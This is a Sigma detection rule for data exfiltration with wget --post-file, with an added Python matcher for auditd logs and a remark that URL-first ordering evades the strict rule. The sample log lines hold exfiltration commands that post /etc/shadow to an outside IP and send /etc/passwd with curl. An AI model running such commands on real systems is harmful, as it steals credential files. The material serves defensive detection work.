Data Exfiltration with Wget
- source: sigma
- techniques:
  - t1048
  - t1048.003
Description
Detects attempts to post a file using the wget utility. An adversary can bypass permission restrictions through a misconfigured sudo permission for the wget utility, which could allow them to read files such as /etc/shadow.
Detection logic
detection:
  selection:
    type: EXECVE
    a0: wget
    a1|startswith: '--post-file='
  condition: selection
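As an added example (not part of the original rule page), the selection above applied to raw auditd EXECVE records: a small parser for audit.log lines and a matcher that mirrors the rule exactly (a0 is wget, a1 starts with --post-file=). The optional any_arg mode goes beyond the page's rule and flags --post-file= in any argument position, which the rule as written does not. The log lines and the IP are constructed for the example.

```python
import re

# Constructed auditd EXECVE records in raw audit.log format (not real captures).
SAMPLE_LOG = """\
type=EXECVE msg=audit(1700000000.123:101): argc=3 a0="wget" a1="--post-file=/etc/shadow" a2="http://203.0.113.10/upload"
type=EXECVE msg=audit(1700000001.456:102): argc=2 a0="wget" a1="http://example.com/index.html"
type=SYSCALL msg=audit(1700000001.456:102): arch=c000003e syscall=59 success=yes exit=0 comm="wget"
type=EXECVE msg=audit(1700000002.789:103): argc=3 a0="curl" a1="--data-binary" a2="@/etc/passwd"
type=EXECVE msg=audit(1700000003.000:104): argc=3 a0="wget" a1="http://203.0.113.10/upload" a2="--post-file=/etc/shadow"
"""

# key=value pairs; values are either "quoted" or a bare non-space token.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
SERIAL_RE = re.compile(r"audit\([\d.]+:(\d+)\)")


def parse_record(line):
    """Turn one audit.log line into a dict of field -> value (quotes stripped).
    Note: real auditd hex-encodes arguments containing spaces or special
    characters (e.g. a1=2D2D...); that encoding is not decoded here."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        key, raw, quoted = m.group(1), m.group(2), m.group(3)
        fields[key] = quoted if quoted is not None else raw
    return fields


def matches_rule(rec, any_arg=False):
    """The page's Sigma selection: type=EXECVE, a0=wget, a1 startswith --post-file=.
    any_arg=True is a broader variant (not the page's rule): --post-file= in any aN."""
    if rec.get("type") != "EXECVE" or rec.get("a0") != "wget":
        return False
    if any_arg:
        return any(v.startswith("--post-file=")
                   for k, v in rec.items() if re.fullmatch(r"a\d+", k))
    return rec.get("a1", "").startswith("--post-file=")


def scan(log_text, any_arg=False):
    """Return the audit serial numbers of the records that match the rule."""
    hits = []
    for line in log_text.splitlines():
        if matches_rule(parse_record(line), any_arg):
            hits.append(int(SERIAL_RE.search(line).group(1)))
    return hits


if __name__ == "__main__":
    print("rule as written:", scan(SAMPLE_LOG))            # [101]
    print("any-argument variant:", scan(SAMPLE_LOG, True))  # [101, 104]
```

Serial 104 shows the gap between the two: wget accepts the URL before --post-file=, so a strict a1-only selection misses that ordering.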